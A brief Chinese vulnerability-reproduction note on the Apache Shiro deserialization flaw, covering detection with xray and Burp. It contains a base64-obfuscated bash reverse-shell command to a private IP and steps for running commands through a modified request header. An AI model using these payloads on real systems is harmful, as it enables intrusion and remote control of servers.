Shiro反序列化漏洞复现

2021-06-28 漏洞复现 127 字

Shiro

1、探测

在登录界面回包中，有rememberMe=deleteMe参数，说明使用Shiro反序列化。

a、使用shiroExploit工具检测，反弹shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY2LjEzOC8xMTExIDA+JjE=}|{base64,-d}|{bash,-i}

b、使用xray检测，直接发送payload

xray webscan --url "http://" --html-output 1.html

或指定脚本检测

xray webscan --url "http://" --plugins shiro --html-output 1.html

将发包贴入burpsuite发包，将Testecho: namzzg修改为Testcmd:ls即可执行对应指令，也可反弹shell，语句同上

作者：沉墨